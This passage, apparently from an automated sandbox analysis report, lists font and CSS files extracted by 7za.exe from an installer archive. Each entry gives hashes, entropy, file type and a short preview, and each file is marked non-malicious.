      SHA-512:F2B979E14B621D5C80C6715EA27DEEACB109FBF2761F1A1C7BB6FC3E21496E1CC5483C4698ECAC252C08F8C601AD4EB32420584598B3273A75C70CD7FD3B9AE8
      Malicious:false
      Reputation:low
      Preview:...........0FFTMi.....<....GDEF.a.....X... GPOS......x..&.GSUBi.r...'.....OS/2...C..,d...`cmap.e....,.....cvt ./....0....@fpgmS./...0....egasp......34....glyf.9[...3<...Phead.........6hhea...........$hmtx.XgH........loca..........jmaxp.Q.m...$... nameL..>...D...:post..........Vprep.(.F........webf.:XZ.................=...............A......................3...................,..latn................kern......................$..... <"..G.:...9.......b.9.........1.....w.........................................................................................b.........\.........}.....3.....s................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Web Open Font Format, TrueType, length 29548, version 1.0
      Category:dropped
      Size (bytes):29548
      Entropy (8bit):7.981991939488048
      Encrypted:false
      SSDEEP:
      MD5:DA802587854B53516EBA680A2187EE0B
      SHA1:2FFCE73E27FD51C47F703FFCFB4CF78AB25C490A
      SHA-256:24014055DEF821F11FE6EFEF343396E33E42A08C9F0EB88AFF0F388089B403DC
      SHA-512:66C338B715751D9AF87813F9AD94D71F0258B8035699C2224063F663A21959D5B51D6CD09EF19BCDAD2967EAE8F32D8B723BF9E3D69277D44DFE4D62D177FCD6
      Malicious:false
      Reputation:low
      Preview:wOFF......sl................................FFTM............i..GDEF........... .a..GPOS..........&....GSUB.......v....i.r.OS/2.......Y...`...Ccmap...l...n.....e..cvt .......@...@./..fpgm...........eS./.gasp................glyf......W....P.9[.head..g....2...6...hhea..h....!...$....hmtx..h,.........XgHloca..k....`...j....maxp..mp... ... .Q.mname..m........:L..>post..oX...s...V...prep..r..........(.Fwebf..sd.........:XZ.........=...............A.x.c`d``..b...`b`d`d4..,`......g.x..Z.H.U.?_..9.Ls2.S.\...+..Ge...+.1.&[...feR...k,.2!......0).Y2.2.....X #DF.....>...........u..}.=..9..s.9.*.D.E.......s.2)..b&.b.y......-M~3)m...s...i/.`D5.y.....A..)..<.......m|.g.../....M.%...s..!d?..w.y.=....|..~.^`.).$...Ob.....'.#b.....W+..JA.p8..7.`g....h.....7 .....Qd^m.i....wLji.....r..c.w=.XI./... .A.}|D....)L...|.;...S.d.......<$8c..l"..C....yB..'..&S.C..N...9a.i/.....&v..3X.9..HJ..r..uq.U.q.|.1^P.@..p.O.....I.u....Z....~...F..Q.0.LX.;..X..x..._...}-...[.....j/....s..r.1..;
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Embedded OpenType (EOT), Proxima Nova Lt family
      Category:dropped
      Size (bytes):66676
      Entropy (8bit):6.093432230709094
      Encrypted:false
      SSDEEP:
      MD5:044AA0B596161750CB58ACA15C52CF38
      SHA1:D40E645B34188A54D909FA40F7EDDEEFB8B9DF03
      SHA-256:790579E11608136663D073BC6F99848C04B4DCD69216DF7DAF5BE00DF573A3FD
      SHA-512:1A3B3ABC614A7DDF673E34A936DE63809F8C18A86409364B2BBDEB608FBCD845095BA7CFB34A0826E2AC18CFC5CCD4D47D4BFA13FAE3CABA7FBC4470D36C8086
      Malicious:false
      Reputation:low
      Preview:t...........................X.....LP.......P........... ....5 k.....................P.r.o.x.i.m.a. .N.o.v.a. .L.t.....S.e.m.i.b.o.l.d.....V.e.r.s.i.o.n. .2...0.0.3...0.P.r.o.x.i.m.a. .N.o.v.a. .L.t. .S.e.m.i.b.o.l.d................0FFTMi.....<....GDEF.a.....X... GPOS.......x..&.GSUBi.r...'.....OS/2...8..,d...`cmap.e....,.....cvt .a....0....DfpgmS./...0....egasp......38....glyf.d....3@...Hhead..........6hhea...........$hmtx!.Y_........loca`.0........jmaxp.Q.{... ... named<.#...@....post......,...Vprep.P.........webf.oXZ.................=.........2.....?......................3...................,..latn................kern......................$..... <"..G.:...=.......f.=.........=.....{.....{...................................................................................f.........\...............3.....f....................................................................................................................................................................................
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:SVG Scalable Vector Graphics image
      Category:dropped
      Size (bytes):107711
      Entropy (8bit):5.082796158249925
      Encrypted:false
      SSDEEP:
      MD5:CC4E1FA796CABA2CF5DC44B67A1DB837
      SHA1:E7D3F96670C9CD050EBC281675072062EAD8DE79
      SHA-256:16E9561A7F81AFA42973E3C8469963ABD1FCA5081997C6DA11DFFF6D0EEA93D4
      SHA-512:E060EE70CBA6369D361FF297429D054ED9D33A837A156A6F96D83EDE2117BEC5C17ECBA19790E0857FE63824EF433F9C614052F961763B537D867366094D5E30
      Malicious:false
      Reputation:low
      Preview:<?xml version="1.0" standalone="no"?>.<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" >.<svg xmlns="http://www.w3.org/2000/svg">.<metadata></metadata>.<defs>.<font id="webfontregular" horiz-adv-x="1181" >.<font-face units-per-em="2048" ascent="1618" descent="-430" />.<missing-glyph horiz-adv-x="526" />.<glyph horiz-adv-x="0" />.<glyph horiz-adv-x="0" />.<glyph horiz-adv-x="682" />.<glyph unicode="&#xd;" horiz-adv-x="682" />.<glyph unicode=" " horiz-adv-x="526" />.<glyph unicode="&#x09;" horiz-adv-x="526" />.<glyph unicode="&#xa0;" horiz-adv-x="526" />.<glyph unicode="!" horiz-adv-x="501" d="M109 121q0 59 41.5 101t99.5 42t100.5 -42t42.5 -101q0 -57 -42.5 -99t-100.5 -42t-99.5 42t-41.5 99zM119 1366h262l-37 -948h-186z" />.<glyph unicode="&#x22;" horiz-adv-x="776" d="M98 1266q0 50 35 85t86 35q50 0 85.5 -35.5t35.5 -84.5q0 -16 -18 -132t-36 -224l-18 -109h-98q-72 430 -72 465zM438 1266q0 50 35 85t86 35q49 0 84 -35t35 -85q0 -16 -18 -132t-36 -224l-
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:TrueType Font data, 19 tables, 1st "FFTM", 19 names, Microsoft, language 0x409, Copyright (c) Mark Simonson, 2005. All rights reserved.Proxima Nova LtSemiboldMarkSimonson: Prox
      Category:dropped
      Size (bytes):66548
      Entropy (8bit):6.096833099237152
      Encrypted:false
      SSDEEP:
      MD5:93EFA507785A35B4F56D0AE1B38C3261
      SHA1:63006D45EEB0F19C12DA2CA574E409562690ECAE
      SHA-256:4E128DC4173BDF2DC3A04FE99212B6224ADF80090587960B203B4EE8381BC4FE
      SHA-512:4A9B14F0B5DDD9D58B90E5316EBF2BC469E1054BD89CD12CD0AD03962B5CE4CBB62EC5BFBF284BD0F6B147780E1BAC090B92CB90E8E9F27B0F413445C60CBF81
      Malicious:false
      Reputation:low
      Preview:...........0FFTMi.....<....GDEF.a.....X... GPOS.......x..&.GSUBi.r...'.....OS/2...8..,d...`cmap.e....,.....cvt .a....0....DfpgmS./...0....egasp......38....glyf.d....3@...Hhead..........6hhea...........$hmtx!.Y_........loca`.0........jmaxp.Q.{... ... nameN#.....@...Fpost..........Vprep.P.........webf.oXZ.................=.........2.....?......................3...................,..latn................kern......................$..... <"..G.:...=.......f.=.........=.....{.....{...................................................................................f.........\...............3.....f................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Web Open Font Format, TrueType, length 29768, version 1.0
      Category:dropped
      Size (bytes):29768
      Entropy (8bit):7.983174075498248
      Encrypted:false
      SSDEEP:
      MD5:4523A793A9C27C15C9D949918DFEEC47
      SHA1:EE605956293E0AAC0091FC6BDE1DA4CE4098614B
      SHA-256:B538E984F48CB576596DA536BE10ADEC497271427F02C6680A15B76E5CAFB6BA
      SHA-512:A7CD3622AC4A708F0A57194FA167FA3FBE3688FF98F89EBD9BDDE3331939712309CD40E1F55DCC7B5BDF64C14CCDE5562F5E9975FBB0770BDF5EF846636CF9BC
      Malicious:false
      Reputation:low
      Preview:wOFF......tH................................FFTM............i..GDEF........... .a..GPOS..........&.....GSUB.......v....i.r.OS/2...d...Y...`...8cmap.......n.....e..cvt ...0...D...D.a..fpgm...t.......eS./.gasp...(............glyf...0..Yi...H.d..head..h....4...6....hhea..h....!...$....hmtx..h.........!.Y_loca..k....b...j`.0.maxp..n4... ... .Q.{name..nT.......FN#..post..p....s...V...prep..s..........P.webf..t@.........oXZ.........=.........2.....?.x.c`d``..b...`b`d`d4..,`......g.x..YO.[E...v.m....m)5...v...nt..jE..(...R..(.-"B.zy.z...]D|.E..=../A...H@..R.D..9x...........k.c......|.7...(N.R..W..v.v.$zH).....W.....&.&...3....@.i._dUEUUI..*.].$Z5UV.....0..7<+<C.4R.....M.*..F...09..........\x...pX.:......;...o.Py.AQ..>.........H8ER.k.z....E.i.....p.<..b./.r....n.j...^.E;jS..@.0x.r........gc......p...5.O...x...K.w.{.0;l8.... ~5-..............U.M8.;....%.....j.iF...r....Z.].#T m.]].q@<.+.[upWB.L.../..+....%T.Y....TR.{XS..3...,....8~JdTK.UV....'$..p.aSs.)...Bo%.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Embedded OpenType (EOT), Roboto Light family
      Category:dropped
      Size (bytes):45474
      Entropy (8bit):7.973701650075971
      Encrypted:false
      SSDEEP:
      MD5:889478BC69A9CFE7CE00665A2D307606
      SHA1:54AD4852E48A7E4762531FE1DCE91B2B95DD5406
      SHA-256:1EE590BCBF3A5F0C1B70E93AB1332E6A230CD44DC21FDD87B80D7E8BD3BA1499
      SHA-512:CA1BE8F6816206B0FCBD1B131A09424A7AB6C0FD4BF40D1643DDE00F9D73FCA6883ADD523AB27FC956D4D0244A4495BC6B6291EEFB1AE59EA998E0B67C7FCDFC
      Malicious:false
      Reputation:low
      Preview:............................,.....LP.....!.P!.......... .....Mo.....................R.o.b.o.t.o. .L.i.g.h.t.....R.e.g.u.l.a.r...,.V.e.r.s.i.o.n. .2...0.0.1.1.5.1.;. .2.0.1.4...(.R.o.b.o.t.o. .L.i.g.h.t. .R.e.g.u.l.a.r.....BSGP.....................q).q/.r^....xZg.icyR..&c..4o4F..w....[..........I0.U...c.h.y..O......rr...p..2.[ji..K..i8.......cH>7..TY.%..o:;......&.M.r?Iz.9FRn...S..S..}...ma.@..$....K.].{..pr......\....3...?...6........q....5.J.Z....5.Q;("|.H.n..2..... ......g.JO.X..5.....:..dd..H..r.@...H.H..4..n..9....6.Z'..n.n.`yb.......~.w..k.<d..`....*....Va....."&..i...3...z....d%...e.kMre..+...V;C3k..m.d.a.....`.1.J...].&..P\.Q.@..\...j......4D. ....No.C.E.jRl...R..6I........Q...+2.-...ghW..gh..G.Z.)`.V.h.!).n.Hlx..6Y.'.L..O|.X.60O%.5+....S...E.8b..IQ..........%Bx8Z\.c...D0...Z....6<.ld.........P...8......yo8y.'P..<r.....!...*r@...9b.#Il..{..P.C...Y..&`..i.`..... N.x..9 ...%...9M....(`$O..p..$......q...f....HSU.......C...,& .e.q..V.!./....>...}y....^\.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:TrueType Font data, 19 tables, 1st "FFTM", 20 names, Microsoft, language 0x409, Copyright 2011 Google Inc. All Rights Reserved.Roboto LightRegularRoboto LightRoboto Light Regul
      Category:dropped
      Size (bytes):114024
      Entropy (8bit):6.514875363859877
      Encrypted:false
      SSDEEP:
      MD5:85DE31A1174903A03F71D02416717C47
      SHA1:E890287451AB3D320DFCA8B7F814866EC00FE4D5
      SHA-256:0C24850EAF892DA4185B6A142F3A7DF0C3D44BA7CAAA6DEC3CDE25EF1ECD0BB1
      SHA-512:64B466338B1D7BA1A3DCCC9805887A39263E948F13DC373AE1B531785BE1E5EFABC058D710B67BD3BF71932E897D0DB850C4AAE6CD3C3EDF2FDCE9FB4E53350D
      Malicious:false
      Reputation:low
      Preview:...........0FFTMdOj<...<....GDEF.Z.....X....GPOS..{......4.GSUB/O)...6....bOS/2.5.)..84...`cmap4..o..8.....cvt .:....<t...BfpgmS./...<....egasp......? ....glyf..Mi..?,..\Phead.......|...6hhea...9.......$hmtx@X.........<locanQ.h....... maxp./.....4... name8.h...T....post..w@........prep.,.T........webf..V....`.............=...............!.>.....................p...q.r...s.v...w.x...y.z...{.|...}.~.....................................................................................................\....DFLT..cyrl.(grek.6latn.D..........................................................cpsp. cpsp.&cpsp.,cpsp.2kern.8.......................................$.,.......*................................"........$.H...%.......%.>...f.g...q.t...v...!.....3.....4.....5.....6.....=.....I.....V... .b.......................................................................................................................................................$.H...%.......%.>...f.g...q.t...v...!.....3.....4....
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Embedded OpenType (EOT), Roboto family
      Category:dropped
      Size (bytes):52409
      Entropy (8bit):7.967860175304393
      Encrypted:false
      SSDEEP:
      MD5:421FB62D91794710D5D619E8E6CBCEF2
      SHA1:78C81537A3ECCF79DF8FC7FA7E01BE868E403F62
      SHA-256:989894DDED80BEDDF3970F998C8A53D34D083A7C76E75E3C48102D14D3EC0D93
      SHA-512:EDEE257CB727E157198702E9FF7984ECBF65A5841FAFB311462F248227F1B1F08DC92BD9A8430B765B90A28C27DEB0956EAF4D8E1B1A753B0A5387DF01B6DE66
      Malicious:false
      Reputation:low
      Preview:..................................LP.....!.P!.......... ....Z.......................R.o.b.o.t.o.....R.e.g.u.l.a.r...,.V.e.r.s.i.o.n. .2...0.0.1.1.0.1.;. .2.0.1.4.....R.o.b.o.t.o. .R.e.g.u.l.a.r.....BSGP..................]...w..}.......xZg.icyR..&c..4o4F..w....[........H...Vb...r..*....`o51W'-A)G.... E...y.}...I.....[...A.....[F....d..GxT..%. ..B..RL.a..e.z....6_.1.w.W......IG....K.[.....#.K...!....:.z.dY.....&.TZ..`RX...;..-.a......B..u...|? ..M.l.J.sa.. .K.....]...P`NVX@o..ZB....e~S.....C............o.>.fQ.@M..........9...)c...}9c(....d.M.....H;....%..H'h...kf-9..6....6......C.h....3....y..-i.1.IA.\m.. ;....vTY._......-[w<..g..A~.P.......3<..st3..j'm5J.b.. .WDK.,.....9..4.......#.|`?.-..#..../.hA....X#..9`....Y.<....F......l.[1R..Wxm.:.v.- .]a.?d..=...A..I.<zBi....8&.../O..Ht.UA+...h.`..V.]ag;d}..D!. ,J.......K..........vI..1IhHbY d..k.'c.`.%{z.&cf..x...j.7.....&.:q;...gD.........yI{?.d...).-'o.n...0..,.t...21...G..+qL(..".m.w..T.....()..r#..3...
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:TrueType Font data, 19 tables, 1st "FFTM", 18 names, Microsoft, language 0x409, Copyright 2011 Google Inc. All Rights Reserved.RobotoRegularRobotoRoboto RegularVersion 2.001101
      Category:dropped
      Size (bytes):139832
      Entropy (8bit):6.498460614916336
      Encrypted:false
      SSDEEP:
      MD5:8354F4A1473F76E3A3E24247A0A41D99
      SHA1:7DC1858FF12A8EC06F8F8AF274B0BBFE4807F673
      SHA-256:F5CC88FF0082E8F6A616CB8829DADF0AE3E206BF6E8D21AD68971E5CD59D1F50
      SHA-512:FD0BB56B3BD51685E391CE56072EF991E57E252E12EDF9E5734FFB6EF9B123A3B357B666A956E0F7F82F3EA57E2445882D661B8B49214E3E0F1C00B47E8EEF02
      Malicious:false
      Reputation:low
      Preview:...........0FFTMdOi....<....GDEF. .....X...8GPOSSx.,.......&GSUB/O)........bOS/2...{.......`cmap4..o...|....cvt .!.....\...>fpgmS./........egasp............glyf..J.......`.head..'.......6hhea...P...T...$hmtxcl.....x...<loca..X*....... maxp./......... name-..........xpost..w@...l....prep.\....!4....webf.CV..."0.............=...............!...........0...........m...n.n...o.s...t.u...v...................\.v..DFLT..cyrl.(grek.6latn.D..........................................................cpsp..kern.....................................T*d.:.......$.H...%.......%.>...f.g...q.t...v...!.....3.....4.....5.....6.....=.....I.....V... .b...................................................................................................................................................l...............B.H.Z.t.~.....".P.....Z.V.p...X.j.|... ...@.R.\.........@.".0.J.0.........H.t.t.t.t...........Z.Z.Z.Z.........R.R.R.R...........0.P.....t.....Z.....B.P...t. ...Z...".........Z.V.`.......|.T.........0
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Embedded OpenType (EOT), Roboto Thin family
      Category:dropped
      Size (bytes):44082
      Entropy (8bit):7.975730993826931
      Encrypted:false
      SSDEEP:
      MD5:FCCC99F55CC8FE49B6757EB00EC75F13
      SHA1:5F1F59DF4E58767E57B7D4C4D1103187CA62824A
      SHA-256:AC968C15F07A6F899A1C17580714311C62D5D1353EFBD3BD6710AF2421D5BBB8
      SHA-512:07169D4646916A41DA6718514F47E20C67E2834CB6F29F4AD8694B4B3FA1BA12FFD364207D6CACAE56C6B8621ABFDFD8DF7CDF6F61DA3506E7405273331753F9
      Malicious:false
      Reputation:low
      Preview:2...D.............................LP.....!.P!.......... ............................R.o.b.o.t.o. .T.h.i.n.....R.e.g.u.l.a.r...,.V.e.r.s.i.o.n. .2...0.0.1.1.5.3.;. .2.0.1.4...&.R.o.b.o.t.o. .T.h.i.n. .R.e.g.u.l.a.r.....BSGP.....................n..n..rb....xZg.icyR..&c..4o4F..w....[..........G.&.1.WF&.8.V.......D..%(....d......]-YV'8......@c6>...AY;U..0..U.,s.7..5..>..2....D=..'t..".m^....b...ye..w.-.7.92..h......M[....E.......$..Mb...k@k7Z....>n.M'.~7B.~..>..Dn.9..t.0...C..HN.;#K..F.#.m.FP.,.@:(.?..}.....q.A...M..rm`....R..k.k..m.q.l..M"G..H......y...gEb.x#..t#q..n......"^.DO...b..vO...FUR....j..jij2ct..<.(.\....X...y....jD..LM....l..3..".*1.i........(9...i......+;@..Y.....Z.....&..g(V...h._..Z....B.\...1.EO.b.H.&...&M.'.M^...1.@.......A...(...P../.Ba>.z@.<....O.SC.L........_3..........Yj..u.RT....}.8......y\9x.&A...8...[.......7..i.](.q..fe.....z....H\......_.H@9i:<..[.......q..Y.....F0H..0'.N.....pz..8(....^W.B.....O.z....C...H.?P*.U.~.#.....B....Lp.l.B
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:TrueType Font data, 19 tables, 1st "FFTM", 20 names, Microsoft, language 0x409, Copyright 2011 Google Inc. All Rights Reserved.Roboto ThinRegularRoboto ThinRoboto Thin RegularV
      Category:dropped
      Size (bytes):113548
      Entropy (8bit):6.486512295751682
      Encrypted:false
      SSDEEP:
      MD5:3731AD0E6DA78C90D077C2F47B37808B
      SHA1:513CE677D3504A073E18FB482187FA2FF1184114
      SHA-256:F712CE7F2DCDD8878BB55A18A91944FAAA86C3F28BDC73E4EB8BCF3BCAF4904F
      SHA-512:0EA013E218BE23C983436383F9811F517CBC72750C90A33B19EF13D22B159C7522BA2FD4004DCE3F1168114BB16B4B59CC03029C6B676BD98DD7CA103EC3B3C6
      Malicious:false
      Reputation:low
      Preview:...........0FFTMdOi....<....GDEF.Z.....X....GPOS.G.{......5.GSUB/O)...6....bOS/2......8X...`cmap4..o..8.....cvt ...:..<....*fpgmS./...<....egasp......?,....glyf......?4..Z.head.......,...6hhea...#...d...$hmtx.C.Z.......<loca8.......... maxp./......... name7...........post..w@........prep............webf.BV..................=...............!.......................p...q.r...s.v...w.x...y.z...{.|...}.~.....................................................................................................\....DFLT..cyrl.(grek.6latn.D..........................................................cpsp. cpsp.&cpsp.,cpsp.2kern.8.......................................$.,.......*................................"........$.H...%.......%.>...f.g...q.t...v...!.....3.....4.....5.....6.....=.....I.....V... .b.......................................................................................................................................................$.H...%.......%.>...f.g...q.t...v...!.....3.....4....
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):444
      Entropy (8bit):4.94118500561983
      Encrypted:false
      SSDEEP:
      MD5:3BE98220035017D9B818F3CC94F87587
      SHA1:BC07F11D0A59F942AC942DBA02214A7041AD6E3A
      SHA-256:CB134DCB95A407795C671A512C389894D3525FBA3F6A2168FC5B9B7E875E78DC
      SHA-512:D2E7D57CB7B7E771C82C75A04FBFB86EBECBB409ECF2C5666AEAA99695474A7985E3367F6A5B3D4AC59F775F60FB084EFA9BDDA99CE3C077DF2690A5F0A6B1D1
      Malicious:false
      Reputation:low
      Preview:@font-face {. font-family: 'DRPcheckbox';. src: url('./fonts/DRPcheckbox/DRPcheckbox.eot');. src: url('./fonts/DRPcheckbox/DRPcheckbox.eot?#iefix') format('embedded-opentype'),. url('./fonts/DRPcheckbox/DRPcheckbox.woff') format('woff'),. url('./fonts/DRPcheckbox/DRPcheckbox.ttf') format('truetype'),. url('./fonts/DRPcheckbox/DRPcheckbox.svg#webfontregular') format('svg');. font-weight: normal;. font-style: normal;.}.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):509
      Entropy (8bit):4.839708035059909
      Encrypted:false
      SSDEEP:
      MD5:EBAE852F3327FDAF3E2FC2BF1CDECB8F
      SHA1:F9753FE176069974FC9BCE49EAE877745282E183
      SHA-256:B5F111103F7F090C246A223B1FF497B94C4DD3AC64BF5B3FB2D91555FCFD6F2C
      SHA-512:BF8E7C5DB7A1EACD4344D5FACFEE1CD66E883389B53BC28E4E387CDB67EA40EE26266BA4282E50EB50A7BC3C810D9FDBB50792A46135761B2E8CE52DDC9E394A
      Malicious:false
      Reputation:low
      Preview:@font-face {. font-family: 'DRPicons';. src: url('./fonts/DRPicons/DRPicons-webfont.eot');. src: url('./fonts/DRPicons/DRPicons-webfont.eot?#iefix') format('embedded-opentype'),. url('./fonts/DRPicons/DRPicons-webfont.woff') format('woff'),. url('./fonts/DRPicons/DRPicons-webfont.ttf') format('truetype'),. url('./fonts/DRPicons/DRPicons-webfont.svg#webfontregular') format('svg');. font-weight: normal;. font-style: normal;.}..icons-controls {. font-family: 'DRPicons' !important;.}.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text
      Category:dropped
      Size (bytes):4818
      Entropy (8bit):5.165213084352732
      Encrypted:false
      SSDEEP:
      MD5:C550A9B9931FBA7B1CDC4669AA2BDD1E
      SHA1:13178992B62E897DFCB33260BB720B645BC0188E
      SHA-256:DE7A78216A8C5DE2A7BA150DCF1252EEF5310D9A99866F3CFD2C9BDDAD2BC3C5
      SHA-512:640EB396C7AF50FCE00BC6F86CE99DE5B7F28D5D95EA5A508D2F978F11990A3FA25A02DB910499DDFC61D504537A95100334E9B926A2E1C3910340F3A8BFA39E
      Malicious:false
      Reputation:low
      Preview:/* ..... ... IE6 */...#loader{..background: url(../Tools/load8.gif) no-repeat scroll center center white;.}.#progress{..color:black;.}.*html .start_head-logo {..width: 263px;..height: 74px;..background: none;..filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src='img/med_logo_dark.png');..background-position: center center;..background-size: 263px 74px;.}../* ...... ...... ......... ...... */.* html #m-down{..background: none;...filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src='img/charms/download.png');..background-position: center center;..}.* html #m-setup{..background: none;..filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src='img/charms/setup.png');..background-position: center center;.}..* html #m-pc {..background: none;..filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src='img/charms/pc.png');..background-position: center center;.}..* html #m-apps{..background: none;..filter: progid:DXImageTransfor
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):331
      Entropy (8bit):4.803321007288539
      Encrypted:false
      SSDEEP:
      MD5:2DBDB8116515F8458F9750F63C074FA7
      SHA1:8B5403BF84CE596D7AC3CF81DCABC189E0612EB9
      SHA-256:2FFFEDDB2D1C6CEE5CC956965B7047B0C2888F48CBA13A4FCB070417F1D4899D
      SHA-512:16B664DE3CD7AAD3E170DF3E19ACBD5006BD02EE293BF03596094E473757832D7D7D8AFC9B7F4968FCD9830D9B52E0751E77FF93CE9A4632C0E40F711F052CD6
      Malicious:false
      Reputation:low
      Preview:.copyright {. position: absolute !important;.}...clearfix {. *zoom: 1;.}..programs-list_head-title,..programs-list_head-btn {. display: inline;.}...window-min-width-1024 .settings-header_caption,..window-min-width-1200 .settings-header_caption {. width: 710px;.}..configurator_content-is-disabled {. visibility: hidden;.}.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:CSV text
      Category:dropped
      Size (bytes):5619
      Entropy (8bit):4.973640058424215
      Encrypted:false
      SSDEEP:
      MD5:460473A59FF9DD03F36C9F58C2DD4607
      SHA1:DECF2E86FC411B90498713A86C3907350674DD76
      SHA-256:83147A9B718187144B8E8810832BAB449A82A32024D793FFB1D2A3A8C877D2F5
      SHA-512:896BCEFE891A0DF22BF62F731E6DA9739C5D9F15E6C3427FDE8E33C946E9422C55D6D77AAE39F5B4313357ED2DA68D5C54D23725D866EAAC99AF950F15BDB4CE
      Malicious:false
      Reputation:low
      Preview:html,..final_promo-button,..menu_item-text,..menu-system_item-text,..menu_language-label,..menu_copyright-btn,..menu_copyright-item,..installed-program_caption,..main tr .installed-program_row,..installed-program_row,..button.btn,..diagnostic-list_row,..screen-title,..program-header_caption,..programs-list_head-title,..installed-program_head-col-name,..start_wrapper-button,..start_msg,..features_col-text,..footer,..start_promo-banner-usa-logo-label,..start_promo-banner-usa-title,..start_promo-banner-usa-footer,..installation-header_wrapper,..installation-list_status-timer,..installation-table_wrapper,..configurator_text,..configurator_type,..programs_text,..programs_type,..installed-program_uninstall-single,..loading-screen_progress-status,..settings-screen_select select,..cta-green-btn,..screen-copyright {. font-family: 'Proxima Nova Semibold', 'Open Sans', 'Gill Sans MT', 'Gill Sans', Corbel, Arial, sans-serif;.}..installed-program_uninstall-single-btn-filler {. display: inline;.}.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:CSV text
      Category:dropped
      Size (bytes):6710
      Entropy (8bit):5.505459560752762
      Encrypted:false
      SSDEEP:
      MD5:DEFBA231994D118C1C43515E3BDD9DBA
      SHA1:E1DE66C17BBB6826CBC75CF56E1417F304E1EE3D
      SHA-256:3E9CE013DDCCBA6A8576B6F090847F8A94579BC3301079B4448EF14E18FE8749
      SHA-512:3586DF0CF924C0FBAF88FB5421E3B243BFA42C00B12CEF1996D52EA1EC15EBA5F0DA3C5DABD406E2643B4900DF456754F8990E454B1AE1B48D13E9414EE24C15
      Malicious:false
      Reputation:low
      Preview:html,..start_msg,..start_wrapper-button,..features_col-text,..configurator_header-text,..configurator_text,..configurator_type,..programs_header-text,..programs_text,..programs_type,..installed-program_uninstall-single {. font-family: 'Proxima Nova Regular', 'Open Sans', 'Gill Sans MT', 'Gill Sans', Corbel, Arial, sans-serif;. filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyJpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMC1jMDYwIDYxLjEzNDc3NywgMjAxMC8wMi8xMi0xNzozMjowMCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXA
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:ASCII text, with very long lines (1858), with no line terminators
      Category:dropped
      Size (bytes):1858
      Entropy (8bit):5.026949279837474
      Encrypted:false
      SSDEEP:
      MD5:E8908CF9CB9504B285327D240187F53B
      SHA1:20EADF1695EB38BCD92D1706DE5335DB61B96502
      SHA-256:86235E2C477078ADFE1188D07CA1E5D8198443AAF2436DE1785A169F3E1D5463
      SHA-512:9C828E8942D40DA89F33D1DB459A7FC12621660331BEF307DF8649E89758E76B044BF97A2CD36D656915E19A8B04F571CDB61D7CB6F926A3BA151EE67BBCDC4B
      Malicious:false
      Reputation:low
      Preview:/*! normalize.css v2.1.3 | MIT License | git.io/normalize */article,aside,details,figcaption,figure,footer,header,hgroup,main,nav,section,summary{display:block}audio,canvas,video{display:inline-block}audio:not([controls]){display:none;height:0}[hidden],template{display:none}html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}a{background:transparent}a:focus{outline:thin dotted}a:active,a:hover{outline:0}h1{font-size:2em;margin:.67em 0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:700}dfn{font-style:italic}hr{-moz-box-sizing:content-box;box-sizing:content-box;height:0}mark{background:#ff0;color:#000}code,kbd,pre,samp{font-family:monospace,serif;font-size:1em}pre{white-space:pre-wrap}q{quotes:"\201C" "\201D" "\2018" "\2019"}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:0}fieldset{border:1px
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):1392
      Entropy (8bit):4.799218013547294
      Encrypted:false
      SSDEEP:
